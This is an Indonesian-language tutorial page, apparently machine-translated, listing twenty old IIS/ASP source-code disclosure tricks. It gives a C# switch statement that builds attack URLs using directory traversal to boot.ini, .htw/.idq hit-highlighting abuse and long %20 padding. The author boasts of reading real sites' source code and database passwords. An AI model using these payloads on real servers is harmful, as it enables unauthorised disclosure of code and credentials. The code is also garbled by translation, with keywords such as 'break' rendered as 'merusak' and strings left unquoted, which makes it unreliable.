Beranda>Tutorial Pemrograman Jaringan>tutorial ASP

20 Metode dan Alat untuk Melihat Kode Sumber Program ASP

Penulis:Eve Cole Waktu Pembaruan:2025-03-13 14:32:01

Seperti yang kita semua tahu, platform Windows memiliki banyak celah, tambalan adalah satu demi satu, tetapi selalu tidak cukup untuk menebusnya. Saya merangkum 20 metode yang saya tahu tentang melihat kode sumber ASP, dan menulis aplikasi dalam C# untuk memindai kerentanan ini. Tetapi dalam dua hari terakhir, saya benar -benar melihat kode sumber dari banyak situs web, termasuk kata sandi basis data. ke database dan lakukan apa pun yang Anda inginkan. Pertama, daftar 20 metode ini di bawah ini:

.

%81

::DATA

%2e

%2e%41sp

+.htr

//

Longhtr

.bak

codebrws.asp

showcode.asp

null.htw

qfullhit.htw

qsumrhit.htw

query.idq

Cari/qfullhit.htw

Cari/qsumrhit.htw

iirturnh.htw

.htw

Terjemahan: f

10 dari kerentanan di atas secara langsung ditambahkan ke file ASP, seperti %81 adalah xxx.asp %81. : Metode tidak tersedia secara langsung melalui browser Unduh semuanya dari situs saya.

sakelar (this.cbomethod.selectectedIndex)

{

Kasus 0: // Baca langsung

strrequestfile = strserver + strurl;

merusak;

Kasus 5: //%2e%41sp

strrequestfile = strserver + strpath + strfirst

+ %2e %41sp;

merusak;

Kasus 8: // Longhtr

strrequestfile = strserver + strurl

+ +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%

+ 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%

+ 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%.HTR;

merusak;

Kasus 10: //codebrws.asp

strrequestfile = strserver + /iissamples/exair/howitworks/codebrws.asp?source=

+ strurl;

merusak;

Kasus 11: //showcode.asp

strrequestfile = strserver + /iissamples/exair/howitworks/codebrws.asp?source=

+ /msadc/../../../boot.ini;

merusak;

Kasus 12: //null.htw

strrequestfile = strserver + /null.htw?ciwebhitsfile=

+ strurl + %20 & cirestriction = none & cihilitetype = full;

merusak;

Kasus 13: //qfullhit.htw

strrequestfile = strserver + /iissamples/issamples/oop/qfullhit.htw?

+ Ciwebhitsfile =/../../boot.ini & cirestriction = tidak ada

+ & Cihilitetype = penuh;

merusak;

Kasus 14: //qsumrhit.htw

strrequestfile = strserver + /iissamples/issamples/oop/qsumrhit.htw?

+ Ciwebhitsfile =/../../boot.ini & cirestriction = tidak ada

+ & Cihilitetype = penuh;

merusak;

Kasus 15: //query.idq

strrequestfile = strserver + /query.idq?citemplate=/../../boot.ini

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%

+ 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%.htx;

merusak;

Kasus 16: //search/qfullhit.htw

strrequestfile = strserver + /iissamples/exair/search/qfullhit.htw?

+ Ciwebhitsfile =/../../boot.ini & cirestriction = tidak ada

+ & Cihilitetype = penuh;

merusak;

Kasus 17: // Cari/qsumrhit.htw

strrequestfile = strserver + /iissamples/exair/search/qsumrhit.htw?

+ Ciwebhitsfile =/../../boot.ini & cirestriction = tidak ada

+ & Cihilitetype = penuh;

merusak;

Kasus 18: //iirturnh.htw

strrequestfile = strserver + /iishelp/iis/misc/iirturnh.htw?

+ Ciwebhitsfile =/../../boot.ini & cirestriction = tidak ada

+ & Cihilitetype = penuh;

merusak;

Kasus 19: //.htw

strrequestfile = strserver + strurl

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%

+ 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20

+%20%20%20%20%20%20%20%20%20%20%.htw?

+ Ciwebhitsfile =/../../boot.ini & cirestriction = tidak ada

+ & Cihilitetype = penuh;

merusak;

bawaan:

strrequestfile = strserver + strurl + this.cbomethod.text;

}

Artikel Terkait